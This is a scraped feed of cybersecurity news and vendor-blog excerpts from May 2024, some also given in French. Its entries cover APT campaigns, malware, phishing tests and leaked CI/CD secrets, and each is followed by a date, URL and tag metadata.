Infrastructure”: ORB networks are infrastructure networks administered by independent entities, contractors, or administrators within the People\'s Republic of China (PRC). They are not controlled by a single APT actor. ORB networks create a network interface, administer a network of compromised nodes, and contract access to those networks to multiple APT actors that will use the ORB networks to carry out their own distinct espionage and reconnaissance. These networks are not controlled by APT actors using them, but rather are temporarily used by these APT actors often to deploy custom tooling more conventionally attributable to known China-nexus adversaries. ORB network infrastructure has a short lifesp]]> 2024-05-22T14:00:00+00:00 https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks/ www.secnews.physaphae.fr/article.php?IdArticle=8504765 False Malware,Tool,Vulnerability,Threat,Prediction,Cloud,Commercial APT 15,APT 5,APT 31 3.0000000000000000 GoogleSec - Firm Security Blog have continued to improve steadily, and “tests” have evolved into announced, advanced training and posted evacuation plans.In this blog, we will analyze the modern practice of Phishing “Tests” as a cybersecurity control as it relates to industry-standard fire protection practices.Modern “Phishing tests” strongly resemble the early “Fire tests”Google currently operates under regulations (for example, FedRAMP in the USA) that require us to perform annual “Phishing Tests.” In these mandatory tests, the Security team creates and sends phishing emails to Googlers, counts how many interact with the email, and educates them on how to “not be fooled” by phishing. These exercises typically collect reporting metrics on sent emails and how many employees “failed” by clicking the decoy link. Usually, further education is required for employees who fail the exercise. Per the FedRAMP pen-testing guidance doc: “U]]> 2024-05-22T13:15:23+00:00 http://security.googleblog.com/2024/05/on-fire-drills-and-phishing-tests.html www.secnews.physaphae.fr/article.php?IdArticle=8511665 False Tool,Threat None 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) An unknown threat actor is exploiting known security flaws in Microsoft Exchange Server to deploy a keylogger malware in attacks targeting entities in Africa and the Middle East. Russian cybersecurity firm Positive Technologies said it identified over 30 victims spanning government agencies, banks, IT companies, and educational institutions. The first-ever compromise dates back to 2021. "This]]> 2024-05-22T13:11:00+00:00 https://thehackernews.com/2024/05/ms-exchange-server-flaws-exploited-to.html www.secnews.physaphae.fr/article.php?IdArticle=8504569 False Malware,Threat None 3.0000000000000000 Bleeping Computer - Magazine Américain Microsoft\'s announcement of the new AI-powered Windows 11 Recall feature has sparked a lot of concern, with many thinking that it has created massive privacy risks and a new attack vector that threat actors can exploit to steal data. [...]]]> 2024-05-22T12:02:24+00:00 https://www.bleepingcomputer.com/news/microsoft/microsofts-new-windows-11-recall-is-a-privacy-nightmare/ www.secnews.physaphae.fr/article.php?IdArticle=8504837 False Threat None 3.0000000000000000 Palo Alto Network - Site Constructeur L'IA transforme la cybersécurité, l'automatisation des tâches et permet une meilleure détection des menaces personnalisées.L'IA a un impact sur les emplois et les services cloud.

---

>AI is transforming cybersecurity, automating tasks and enabling better custom threat detection. AI impacts jobs and cloud services. ]]> 2024-05-22T12:00:46+00:00 https://www.paloaltonetworks.com/blog/2024/05/ai-in-cyber-is-here-to-stay/ www.secnews.physaphae.fr/article.php?IdArticle=8504697 False Threat,Cloud None 3.0000000000000000 Zimperium - cyber risk firms for mobile Dans ce blog, Zimperium explique comment le paysage des menaces à multiples facettes de la sécurité mobile s'étend au-delà du protocole SS7.

---

>In this blog, Zimperium shares how the multifaceted threat landscape of mobile security expands beyond the SS7 protocol. ]]> 2024-05-22T12:00:00+00:00 https://www.zimperium.com/blog/the-multifaceted-threat-landscape-of-mobile-security/ www.secnews.physaphae.fr/article.php?IdArticle=8504698 False Threat,Mobile None 3.0000000000000000 AlienVault Lab Blog - AlienVault est un acteur de defense majeur dans les IOC keep our money online, and store precious memories and documents in the cloud. But what happens to this vast digital footprint when we\'re gone? The persistence of our online presence long after we\'ve drawn our final breaths has given rise to a new frontier in data management – the digital afterlife. As more of our personal information becomes digitized, it has become important to thoughtfully plan for the handling of this data. Gone are the days when we could neatly bequeath our earthly possessions to loved ones; now, we must grapple with the complex web of passwords, accounts, and digital assets that make up our modern-day legacies. With personal data strewn across the internet, the risks of identity theft, privacy breaches, and unauthorized access to our digital lives will only continue to grow. Navigating this complex landscape of digital legacies is a delicate balance that requires thoughtful consideration. The Scope of Digital Legacies When we think of legacies in a traditional sense, we imagine physical assets – houses, heirlooms, vehicles, cash, etc. However, virtual assets like social media accounts, email inboxes, online bank accounts, multimedia libraries, and cloud-based storage also represent critical components of a person\'s digital estate. These virtual assets not only hold sentimental value in the form of memories, messages, and cherished media, but they may also contain sensitive financial and personal information that requires careful consideration after the owner\'s passing. Imagine an elderly relative of yours has been dabbling in some deep-in-the-money options, and his account lies unprotected now that no one has official access to it. What’s more, many asset protection strategies and plans don’t consider digital accounts and non-traditional securities as something that’s to be protected upon the passing of the owner. In such situations, the risk of losing your relative’s wealth becomes all too real. The Challenges of Managing Digital Legacies While digital assets have transformed how we think about personal legacies, they have also introduced a complex web of challenges that we must navigate with great care. Legal Considerations Questions of ownership and access rights can be fuzzy, as traditional estate laws often fail to keep pace with the rapid evolution of technology. Additionally, different online platforms have varied terms of service that can complicate the execution of a will or the desires of the deceased’s family. Further complicating matters is the patchwork of privacy and data protection regulations that vary by jurisdiction, making it challenging to en]]> 2024-05-22T10:00:00+00:00 https://cybersecurity.att.com/blogs/security-essentials/digital-legacies-securing-data-in-the-afterlife www.secnews.physaphae.fr/article.php?IdArticle=8504632 False Threat,Legislation,Cloud None 2.0000000000000000 BlackBerry - Fabricant Matériel et Logiciels As part of our continuous threat hunting efforts across the Asia-Pacific region, BlackBerry discovered Pakistani-based APT group Transparent Tribe targeting the government, defense and aerospace sectors of India. ]]> 2024-05-22T08:01:00+00:00 https://blogs.blackberry.com/en/2024/05/transparent-tribe-targets-indian-government-defense-and-aerospace-sectors www.secnews.physaphae.fr/article.php?IdArticle=8504897 False Threat APT 36 3.0000000000000000 Netskope - etskope est une société de logiciels américaine fournissant une plate-forme de sécurité informatique Introduction Microsoft a récemment mis en évidence l'abus de l'outil de support à distance rapide dans les attaques sophistiquées d'ingénierie sociale conduisant à des infections à ransomwares.Ce billet de blog résume la menace et recommande une stratégie d'atténuation pour les clients de NetSkope.Chaîne d'attaque Un groupe d'adversaire inconnu exploite une aide rapide aux campagnes d'ingénierie sociale ciblées.Ces attaques généralement [& # 8230;]

---

>Introduction Microsoft has recently highlighted the abuse of the remote support tool Quick Assist in sophisticated social engineering attacks leading to ransomware infections. This blog post summarizes the threat and recommends a mitigation strategy for Netskope customers. Attack Chain An unknown adversary group is exploiting Quick Assist in targeted social engineering campaigns. These attacks typically […] ]]> 2024-05-21T20:48:29+00:00 https://www.netskope.com/blog/netskope-threat-coverage-microsoft-quick-assist-ransomware-attacks www.secnews.physaphae.fr/article.php?IdArticle=8504287 False Ransomware,Tool,Threat None 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) The persistent threat actors behind the SolarMarker information-stealing malware have established a multi-tiered infrastructure to complicate law enforcement takedown efforts, new findings from Recorded Future show. "The core of SolarMarker\'s operations is its layered infrastructure, which consists of at least two clusters: a primary one for active operations and a secondary one likely]]> 2024-05-21T18:37:00+00:00 https://thehackernews.com/2024/05/solarmarker-malware-evolves-to-resist.html www.secnews.physaphae.fr/article.php?IdArticle=8504065 False Malware,Threat,Legislation None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-05-21T18:21:28+00:00 https://community.riskiq.com/article/cbf8691b www.secnews.physaphae.fr/article.php?IdArticle=8504244 False Ransomware,Malware,Threat,Prediction None 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) One of the enduring challenges of building modern applications is to make them more secure without disrupting high-velocity DevOps processes or degrading the developer experience. Today\'s cyber threat landscape is rife with sophisticated attacks aimed at all different parts of the software supply chain and the urgency for software-producing organizations to adopt DevSecOps practices that deeply]]> 2024-05-21T17:03:00+00:00 https://thehackernews.com/2024/05/five-core-tenets-of-highly-effective.html www.secnews.physaphae.fr/article.php?IdArticle=8504002 False Threat None 2.0000000000000000 Dark Reading - Informationweek Branch Graph and streaming databases are helping defenders deal with complex, real-time threat and cybersecurity data to find weak points before attackers.]]> 2024-05-21T16:34:03+00:00 https://www.darkreading.com/cybersecurity-analytics/picking-right-database-tech-cybersecurity-defense www.secnews.physaphae.fr/article.php?IdArticle=8504411 False Threat None 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) A critical security flaw has been disclosed in the llama_cpp_python Python package that could be exploited by threat actors to achieve arbitrary code execution. Tracked as CVE-2024-34359 (CVSS score: 9.7), the flaw has been codenamed Llama Drama by software supply chain security firm Checkmarx. "If exploited, it could allow attackers to execute arbitrary code on your system,]]> 2024-05-21T15:52:00+00:00 https://thehackernews.com/2024/05/researchers-uncover-flaws-in-python.html www.secnews.physaphae.fr/article.php?IdArticle=8503971 False Threat None 2.0000000000000000 Bleeping Computer - Magazine Américain Western Sydney University (WSU) has notified students and academic staff about a data breach after threat actors breached its Microsoft 365 and Sharepoint environment. [...]]]> 2024-05-21T15:39:43+00:00 https://www.bleepingcomputer.com/news/security/western-sydney-university-data-breach-exposed-student-data/ www.secnews.physaphae.fr/article.php?IdArticle=8504255 False Data Breach,Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) #### Targeted Geolocations - United States #### Targeted Industries - Education - Higher Education - Government Agencies & Services ## Snapshot Proofpoint has detected a SugarGh0st RAT campaign active during May 2024 aimed at US organizations involved in artificial intelligence, including those in academia, private industry, and government. ## Description The campaign uses a remote access trojan (RAT) variant of the older Gh0stRAT. Historically, Gh0stRAT has been used by Chinese-speaking threat actors to target users in Central and East Asia.  In this campaign, the threat actors used a free email account to send AI-themed spearphishing emails to targets that instructed them to open an attached zip file. Upon opening the file, an LNK shortcut file deployed a JavaScript dropper that then installed the SugarGh0st payload, employing various techniques like base64 encoding, ActiveX tool abuse, and multi-stage shellcode execution to establish persistence and exfiltrate data.  Proofpoint notes that it has observed a relatively small number of campaigns involving SugarGh0stRAT since it was first detected in 2023. Previous targets include a US telecommunications company, an international media organization, and a South Asian government organization. Proofpoint assesses that these campaigns are extremely targeted. This most recent campaign appears to have targeted less than 10 individuals, all of whom are connected to a single US artificial intelligence organization. ## References [Security Brief: Artificial Sweetener: SugarGh0st RAT Used to Target American Artificial Intelligence Experts](https://www.proofpoint.com/us/newsroom/news/us-ai-experts-targeted-sugargh0st-rat-campaign). Microsoft (accessed 2024-05-21)]]> 2024-05-21T15:18:47+00:00 https://community.riskiq.com/article/a67a621d www.secnews.physaphae.fr/article.php?IdArticle=8504155 False Tool,Threat None 3.0000000000000000 Bleeping Computer - Magazine Américain Threat actors were found breaching AWS accounts using authentication secrets leaked as plaintext in Atlassian Bitbucket artifact objects. [...]]]> 2024-05-21T15:05:46+00:00 https://www.bleepingcomputer.com/news/security/bitbucket-artifact-files-can-leak-plaintext-authentication-secrets/ www.secnews.physaphae.fr/article.php?IdArticle=8504284 False Threat None 3.0000000000000000 Dark Reading - Informationweek Branch A threat campaign luring users with malicious documents related to human rights and public notices is aimed at giving the Russia-backed threat group access to victims' systems for cyber-espionage purposes.]]> 2024-05-21T14:43:37+00:00 https://www.darkreading.com/cyberattacks-data-breaches/russia-turla-apt-msbuild-tinyturla-backdoor www.secnews.physaphae.fr/article.php?IdArticle=8504106 False Threat None 3.0000000000000000 Security Through Education - Security Through Education As the temperatures rise and summer approaches, so do the schemes of cybercriminals looking to exploit unsuspecting individuals. Whether you’re […]]]> 2024-05-21T14:00:39+00:00 https://www.social-engineer.org/general-blog/watch-out-for-these-summer-break-scams/ www.secnews.physaphae.fr/article.php?IdArticle=8510752 False Threat None 2.0000000000000000 Mandiant - Blog Sécu de Mandiant   While investigating recent exposures of Amazon Web Services (AWS) secrets, Mandiant identified a scenario in which client-specific secrets have been leaked from Atlassian\'s code repository tool, Bitbucket, and leveraged by threat actors to gain unauthorized access to AWS. This blog post illustrates how Bitbucket Secured Variables can be leaked in your pipeline and expose you to security breaches.  Background Bitbucket is a code hosting platform provided by Atlassian and is equipped with a built-in continuous integration and continuous delivery/deployment (CI/CD) service called Bitbucket Pipelines. Bitbucket Pipelines can be used to execute CI/CD use cases like deploying and maintaining resources in AWS. Bitbucket includes an administrative function called "Secured Variables" that allows administrators to store CI/CD secrets, such as AWS keys, directly in Bitbucket for easy reference by code libraries.  CI/CD Secrets: CI/CD Secrets serve as the authentication and authorization backbone within CI/CD pipelines. They provide the credentials required for pipelines to interact with platforms like AWS, ensuring pipelines possess the appropriate permissions for their tasks. Secrets are often extremely powerful and are beloved by attackers because they present an opportunity for direct, unabated access to an environment. Maintaining confidentiality of secrets while balancing ease of use by developers is a constant struggle in securing CI/CD pipelines.  Bitbucket Secured Variables: Bitbucket provides a way to store variables so developers can quickly reference them when writing code. Additionally, Bitbucket offers an option to declare a variable as a "secured variable" for any data that is sensitive. A secured variable is designed such that, once its value is set by an administrator, it can no longer be read in plain text. This structure allows developers to make quick calls to secret variables without exposing their values anywhere in Bitbucket. Unless… Exporting Secrets from Bitbucket in Plain Text CI/CD pipelines are designed just like the plumbing in your house. Pipes, valves, and regulators all work in unison to provide you with reliable, running water. CI/CD pipelines are a complicated orchestration of events to accomplish a specific task. In order to accomplish this, these pipelines are highly proficient at packaging and deploying large volumes of data completely autonomously. As a developer, this creates countless possibilities for automating work, but, as a security professional, it can be a cause for anxiety and heartburn. Perhaps it\'s a line of code with a hardcoded secret sneaking into production. Maybe it\'s a developer accidentally storing secrets locally on their machine. Or maybe, as we have seen in recent investigations,  it\'s a Bitbucket artifact object containing secrets for an AWS environment being published to publicly available locations like S3 Buckets or company websites.  Bitbucket secured variables are a convenient way to store secrets locally in Bitbucket for quick reference by developers; however, they come with one concerning characteristic-they can be exposed in plain text through artifact objects. If a Bitbucket variable-secured or not secured-is copied to an artifact object using the artifacts: command, the result will generate a .txt file with]]> 2024-05-21T14:00:00+00:00 https://cloud.google.com/blog/topics/threat-intelligence/bitbucket-pipeline-leaking-secrets/ www.secnews.physaphae.fr/article.php?IdArticle=8504062 False Tool,Threat,Studies None 3.0000000000000000 Global Security Mag - Site de news francais Malwares]]> 2024-05-21T12:51:32+00:00 https://www.globalsecuritymag.fr/intelligence-artificielle-deepfakes-synchronisation-audio-et-piratage-des.html www.secnews.physaphae.fr/article.php?IdArticle=8504031 False Threat None 2.0000000000000000 Global Security Mag - Site de news francais rapports spéciaux

---

New privacy research pegs AI as a rival threat to cybercrime – More than half of developers believe AI will almost equal Cybercrime in terms of risk to data privacy – Developers concerned about current regulatory frameworks, with 98% advocating for proactive measures to address future data privacy concerns - Special Reports]]> 2024-05-21T11:50:53+00:00 https://www.globalsecuritymag.fr/new-privacy-research-pegs-ai-as-a-rival-threat-to-cybercrime.html www.secnews.physaphae.fr/article.php?IdArticle=8504034 False Threat None 2.0000000000000000 HackRead - Chercher Cyber Par deeba ahmed Les chercheurs de point de contrôle ont détaillé un nouveau groupe de pirates parrainé par l'État iranien appelé Void Manticore, en partenariat avec Scarred Manticore, un autre groupe de menaces basé dans le ministère de l'Intension et de la Sécurité de l'Iran. . Ceci est un article de HackRead.com Lire le post original: Les pirates d'État iraniens s'associent pour des attaques à grande échelle, rapport

---

>By Deeba Ahmed Check Point researchers have detailed a new Iranian state-sponsored hacker group called Void Manticore, partnering with Scarred Manticore, another threat group based in Iran\'s Ministry of Intelligence and Security. This is a post from HackRead.com Read the original post: Iranian State Hackers Partner Up for Large-Scale Attacks, Report]]> 2024-05-21T11:37:37+00:00 https://www.hackread.com/iranian-state-hackers-partner-up-for-attacks/ www.secnews.physaphae.fr/article.php?IdArticle=8504004 False Threat APT 34 2.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine Rapid7 found there were more mass compromise events arose from zero-day vulnerabilities than from n-day vulnerabilities in 2023]]> 2024-05-21T11:30:00+00:00 https://www.infosecurity-magazine.com/news/network-security-flaws-exploited/ www.secnews.physaphae.fr/article.php?IdArticle=8504001 False Vulnerability,Threat None 3.0000000000000000 AlienVault Lab Blog - AlienVault est un acteur de defense majeur dans les IOC significantly impact their jobs, according to a survey by the International Information System Security Certification Consortium (ISC2). With only 35% of the respondents having already witnessed AI’s effects on their jobs, there’s no question that there is a level of uncertainty regarding the future within the industry and how much of a role AI will play. From the negatives to the silver lining, AI has the potential to greatly transform the cybersecurity landscape in the coming years — a reality that can lead many Silicon Valley professionals to expand their horizons. A Brief Outlook AI is rapidly transforming the modern cybersecurity landscape, according to Station X. “It is enhancing the capabilities of bad actors to perform more sophisticated attacks while empowering cyber security professionals to elevate their defenses.” To highlight a few of many advantages, AI provides immediate access to an extensive knowledge base, serves as a reliable copilot for task execution, automates the protection of systems, and can even augment the workflow of professionals to increase efficiency, Station X points out. Andrew Shikiar, executive director at FIDO Alliance, expands on the threat of AI going forward in 2024. “The threat posed by AI to cybersecurity is real, but there is certainly a ‘hype’ element in how big a share of highly sophisticated new AI attacks and data breaches are going to pose.” Phishing, deep fakes, and disinformation are all identified as threats that AI brings to the table. In regard to phishing, SecurityWeek notes that if AI-as-a-service does emerge in 2024, it will lead to an increase in phishing incidents. Ivan Novikov, founder and CEO at Wallarm warns: “These AI models can provide novice malicious actors with advanced capabilities… which were once the domain of more skilled hackers.” The rise of AI can leave many feeling hopeless regarding the outlook of cybersecurity jobs, with the worry that technological advancements will eliminate valuable positions in the coming years. However, Station X goes on to point out that currently, there is a high demand for skilled cyber professionals in the job market, with an expectation that by 2025 there will be 3.5 million unfilled cybersecurity jobs “due to a lack of skilled professionals and a growing need to secure more and more systems.” A silver lining AI will undoubtedly have a profound impact on sectors like cybersecurity, though there is a silver lining to keep in mind. Infosecurity Magazine dives deeper into the report by ISC2, which reveals that more than four in five respondents (82%) agree that AI will improve job efficiency for cyber professionals (it’s further noted that 42% strongly agree with this statement). Furthermore, the report found that more than half of respondents]]> 2024-05-21T10:00:00+00:00 https://cybersecurity.att.com/blogs/security-essentials/beyond-silicon-valley-where-cybersecurity-pros-are-heading-in-an-ai-dominant-future www.secnews.physaphae.fr/article.php?IdArticle=8503946 False Tool,Vulnerability,Threat None 2.0000000000000000 Global Security Mag - Site de news francais Investigations]]> 2024-05-21T09:21:24+00:00 https://www.globalsecuritymag.fr/risk-report-2024-de-zscaler-threatlabz-face-a-la-multiplication-des-exploits-78.html www.secnews.physaphae.fr/article.php?IdArticle=8503944 False Threat None 3.0000000000000000 Global Security Mag - Site de news francais rapports spéciaux

---

Rapid7 Releases Attack Intelligence Report Examining High-Impact Attacks and Vulnerability Data Trends Multi-year trend shows more zero-day vulnerabilities leading to mass compromise events - Special Reports]]> 2024-05-21T09:14:08+00:00 https://www.globalsecuritymag.fr/rapid7-releases-attack-intelligence-report-examining-high-impact-attacks-and.html www.secnews.physaphae.fr/article.php?IdArticle=8503945 False Vulnerability,Threat,Prediction None 2.0000000000000000 ProofPoint - Cyber Firms 2024-05-21T05:00:13+00:00 https://www.proofpoint.com/us/blog/ciso-perspectives/fourth-annual-voice-of-the-ciso-people-risk-concern www.secnews.physaphae.fr/article.php?IdArticle=8503911 False Ransomware,Tool,Vulnerability,Threat,Studies,Cloud None 4.0000000000000000 ComputerWeekly - Computer Magazine 2024-05-21T04:00:00+00:00 https://www.computerweekly.com/news/366585774/The-Security-Interviews-What-is-the-real-cyber-threat-from-China www.secnews.physaphae.fr/article.php?IdArticle=8503880 False Threat None 3.0000000000000000 Dark Reading - Informationweek Branch The Siren email mailing list will focus on operational impact and response and act as a central location to provide information about threats and necessary post-disclosure activities.]]> 2024-05-21T00:52:11+00:00 https://www.darkreading.com/application-security/openssf-siren-to-share-threat-intelligence-for-open-source-software www.secnews.physaphae.fr/article.php?IdArticle=8503996 False Threat None 3.0000000000000000 WatchGuard - Fabricant Matériel et Logiciels 2024-05-21T00:00:00+00:00 https://www.watchguard.com/fr/wgrd-news/press-releases/la-franchise-de-hockey-americaine-kraken-de-seattle-adopte-la-solution www.secnews.physaphae.fr/article.php?IdArticle=8509306 False Threat,Cloud None 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) An Iranian threat actor affiliated with the Ministry of Intelligence and Security (MOIS) has been attributed as behind destructive wiping attacks targeting Albania and Israel under the personas Homeland Justice and Karma, respectively. Cybersecurity firm Check Point is tracking the activity under the moniker Void Manticore, which is also known as Storm-0842 (formerly DEV-0842) by]]> 2024-05-20T21:35:00+00:00 https://thehackernews.com/2024/05/iranian-mois-linked-hackers-behind.html www.secnews.physaphae.fr/article.php?IdArticle=8503509 False Threat None 2.0000000000000000 DarkTrace - DarkTrace: AI bases detection Discover how Eking ransomware targeted a government organization in APAC. Learn about ransomware as a service & the cyber AI technology that stopped the threat.]]> 2024-05-20T20:22:11+00:00 https://darktrace.com/blog/ransomware-as-a-service-eking-targets-government-organization www.secnews.physaphae.fr/article.php?IdArticle=8503617 False Ransomware,Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-05-20T20:03:06+00:00 https://community.riskiq.com/article/cdc0c90f www.secnews.physaphae.fr/article.php?IdArticle=8503644 False Malware,Threat None 2.0000000000000000 knowbe4 - cybersecurity services 2024-05-20T18:55:38+00:00 https://blog.knowbe4.com/nearly-90-of-threats-involve-social-engineering www.secnews.physaphae.fr/article.php?IdArticle=8503558 False Threat,Studies None 3.0000000000000000 Netskope - etskope est une société de logiciels américaine fournissant une plate-forme de sécurité informatique The “I&O Perspectives” blog series features interviews with industry visionaries and experts with roles in product management, consulting, engineering and more. Our goal is to present different viewpoints and predictions on how organizations’ networking, infrastructure and operations (I&O) are impacted by the current threat landscape, existing networking and cybersecurity tools, as well as implications for […] ]]> 2024-05-20T18:55:02+00:00 https://www.netskope.com/blog/navigating-the-future-of-cybersecurity-top-io-challenges-for-the-year-ahead www.secnews.physaphae.fr/article.php?IdArticle=8503557 False Tool,Threat None 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Multiple threat actors are weaponizing a design flaw in Foxit PDF Reader to deliver a variety of malware such as Agent Tesla, AsyncRAT, DCRat, NanoCore RAT, NjRAT, Pony, Remcos RAT, and XWorm. "This exploit triggers security warnings that could deceive unsuspecting users into executing harmful commands," Check Point said in a technical report. "This exploit has been used by multiple]]> 2024-05-20T17:50:00+00:00 https://thehackernews.com/2024/05/foxit-pdf-reader-flaw-exploited-by.html www.secnews.physaphae.fr/article.php?IdArticle=8503379 False Malware,Threat,Technical None 2.0000000000000000 Dragos - CTI Society Les informations fournies ici proviennent de chasseurs d'adversaires et d'analystes de la cyber-menace de l'intelligence et des analystes qui effectuent des recherches sur l'adversaire ... Le post traversant le paysage cyber-menace de la technologie opérationnelle 2023 d'abordest apparu sur dragos .

---

>Information provided here is sourced from Dragos OT Cyber Threat Intelligence adversary hunters and analysts who conduct research on adversary... The post Traversing the 2023 Operational Technology Cyber Threat Landscape  first appeared on Dragos.]]> 2024-05-20T15:00:00+00:00 https://www.dragos.com/blog/traversing-the-2023-operational-technology-cyber-threat-landscape/ www.secnews.physaphae.fr/article.php?IdArticle=8503447 False Threat,Industrial None 4.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) A "multi-faceted campaign" has been observed abusing legitimate services like GitHub and FileZilla to deliver an array of stealer malware and banking trojans such as Atomic (aka AMOS), Vidar, Lumma (aka LummaC2), and Octo by impersonating credible software like 1Password, Bartender 5, and Pixelmator Pro. "The presence of multiple malware variants suggests a broad cross-platform targeting]]> 2024-05-20T14:56:00+00:00 https://thehackernews.com/2024/05/cyber-criminals-exploit-github-and.html www.secnews.physaphae.fr/article.php?IdArticle=8503323 False Malware,Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-05-20T14:19:33+00:00 https://community.riskiq.com/article/8374cff8 www.secnews.physaphae.fr/article.php?IdArticle=8503469 False Ransomware,Malware,Tool,Vulnerability,Threat,Medical None 2.0000000000000000 Recorded Future - FLux Recorded Future 2024-05-20T14:18:17+00:00 https://therecord.media/openssf-siren-open-source-threat-intelligence-mailing-list www.secnews.physaphae.fr/article.php?IdArticle=8503450 False Threat None 2.0000000000000000 Checkpoint - Fabricant Materiel Securite La recherche sur les points de contrôle (RCR) a suivi activement les activités de Void Manticore, un acteur iranien des menaces affiliée au ministère de l'Information et de la Sécurité (MOIS).Cet acteur de menace a attiré l'attention pour son implication dans les attaques de l'essuyage destructrices, souvent associées à des opérations d'influence.Notamment, le vide Manticore a adopté divers personnages en ligne pour mener à bien ses opérations, les plus importants étant & # 8220; Homeland Justice & # 8221;pour les attaques en Albanie et & # 8220; Karma & # 8221;pour les opérations ciblant Israël.Faits saillants clés: le vide Manticore, lié au ministère iranien de l'intelligence et de la sécurité (MOIS), exécute des attaques d'essuyage destructrices aux côtés des opérations d'influence.Opérant sous divers [& # 8230;] en ligne [& # 8230;]

---

>Check Point Research (CPR) has been actively monitoring the activities of Void Manticore, an Iranian threat actor affiliated with the Ministry of Intelligence and Security (MOIS). This threat actor has garnered attention for its involvement in destructive wiping attacks, often coupled with influence operations. Notably, Void Manticore has adopted various online personas to carry out its operations, with the most prominent ones being “Homeland Justice” for attacks in Albania and “Karma” for operations targeting Israel. Key Highlights: Void Manticore, linked to the Iranian Ministry of Intelligence and Security (MOIS), executes destructive wiping attacks alongside influence operations. Operating under various online […] ]]> 2024-05-20T13:00:56+00:00 https://blog.checkpoint.com/research/unveiling-void-manticore-structured-collaboration-between-espionage-and-destruction-in-mois/ www.secnews.physaphae.fr/article.php?IdArticle=8503374 False Threat None 2.0000000000000000 Checkpoint - Fabricant Materiel Securite Dans le paysage des menaces en constante évolution en constante évolution, il est plus important que jamais d'avoir une forte posture de sécurité en place.Les acteurs de la menace deviennent de plus en plus sophistiqués et augmentent leur taux d'attaques & # 8211;Selon Check Point Research, les cyberattaques ont augmenté de 28% en 1 \\ '2024.De nombreuses organisations comptent sur leurs CISO pour comprendre les risques et menaces auxquels ils pourraient être exposés à & # 8211;Mais cela devient une tâche de plus en plus difficile car ils sont également chargés de permettre l'entreprise.Cela signifie qu'avoir un moyen facile de visualiser et d'analyser les mesures de cybersécurité est essentielle pour les CISO à [& # 8230;]

---

>In today\'s constantly evolving threat landscape, it is more important than ever to have a strong security posture in place. Threat actors are becoming more sophisticated and are increasing their rate of attacks – according to Check Point Research, cyber attacks increased 28% in Q1\'2024. Many organizations rely on their CISOs to understand the risks and threats which they could be exposed to – but this is becoming an increasingly challenging task as they are also tasked with enabling the business. This means that having an easy way to view and analyze cyber security metrics is essential for CISOs to […] ]]> 2024-05-20T13:00:38+00:00 https://blog.checkpoint.com/infinity-global-services/implement-a-continuous-threat-exposure-management-ctem-program-with-check-point-igs-consulting-services/ www.secnews.physaphae.fr/article.php?IdArticle=8503375 False Threat None 2.0000000000000000 Checkpoint Research - Fabricant Materiel Securite Pour les dernières découvertes de cyber-recherche pour la semaine du 20 mai, veuillez télécharger notre bulletin menace_intelligence.Les principales attaques et violations du fournisseur de prescriptions électroniques australien Medisesecure ont subi une attaque de ransomware importante, entraînant des perturbations généralisées et des violations de données.L'impact de l'attaque a été profond, affectant largement les données sur les soins de santé dans le pays.[& # 8230;]

---

>For the latest discoveries in cyber research for the week of 20th May, please download our Threat_Intelligence Bulletin. TOP ATTACKS AND BREACHES Australian electronic prescriptions provider MediSecure suffered a significant ransomware attack, leading to widespread disruptions and data breaches. The impact of the attack has been profound, broadly affecting healthcare data broadly in the country. […] ]]> 2024-05-20T10:46:02+00:00 https://research.checkpoint.com/2024/20th-may-threat-intelligence-report/ www.secnews.physaphae.fr/article.php?IdArticle=8503322 False Ransomware,Threat,Medical None 2.0000000000000000 Checkpoint Research - Fabricant Materiel Securite Introduction Depuis octobre 2023, Check Point Research (RCR) a activement surveillé et chassé les menaces parrainées par l'État ciblant les organisations israéliennes avec des attaques destructrices utilisant des essuie-glaces et des ransomwares.Parmi ces menaces, le vide Manticore (alias & # 160; Storm-842) se démarque comme un acteur de menace iranien connu pour mener des attaques destructrices et une divulgation d'informations à travers le personnage en ligne \\ 'karma \' (parfois écrit comme karma).[& # 8230;]

---

>Introduction Since October 2023, Check Point Research (CPR) has actively monitored and hunted state-sponsored threats targeting Israeli organizations with destructive attacks using wipers and ransomware. Among these threats, Void Manticore (aka Storm-842) stands out as an Iranian threat actor known for conducting destructive attacks and leaking information through the online persona \'Karma\' (sometime written as KarMa). […] ]]> 2024-05-20T10:01:00+00:00 https://research.checkpoint.com/2024/bad-karma-no-justice-void-manticore-destructive-activities-in-israel/ www.secnews.physaphae.fr/article.php?IdArticle=8503290 False Ransomware,Threat None 2.0000000000000000 AlienVault Lab Blog - AlienVault est un acteur de defense majeur dans les IOC A 2024 risk report states that 94% of organizations fall victim to phishing attacks, and 96% are negatively impacted by them. However, phishing attacks are not only growing in number but are also more sophisticated and successful. This is owing to the modern multi-stage phishing attack, which is common nowadays. The multi-stage phishing attack is a sophisticated and multifaceted technique that increases the likelihood of success of an attack. While these attacks are becoming increasingly common, there needs to be more awareness of them. Therefore, to find relevant measures for mitigating these attacks, organizations must gain crucial insights regarding these multifaceted threats covered in this blog. What is a Multi-stage Phishing Attack? As its name suggests, a multi-stage phishing attack is a complex form of traditional phishing. In a multi-stage setup, a phishing attack relies on more deceptive strategies and phases rather than solely relying on one deceptive email, unlike in a traditional phishing attack. All the phases within the multi-stage phishing attack are designed to build trust and gather relative information about the target over time. Since this approach works discreetly on a multi-phased setup, it allows threat actors to bypass advanced security measures such as residential proxies and phishing detection tools. Multi-stage phishing attacks are a common occurrence in the modern cyber threat landscape. Attackers use this sophisticated layered tactic to deploy targeted ransomware or while conducting successful business email compromise (BEC) attacks. Dissecting a multi-stage phishing attack A multi-stage phishing attack is a sophisticated strategy that relies on a sequence of carefully designed steps. These steps help increase the probability of a successful phishing attack by evading advanced security and detection techniques. A typical multi-stage approach to the attack consists of the following phases: Initial Contact Like any traditional attack, the multi-stage attack starts with the threat actor initiating contact with the target through seemingly innocuous means. These include social media messages, phishing 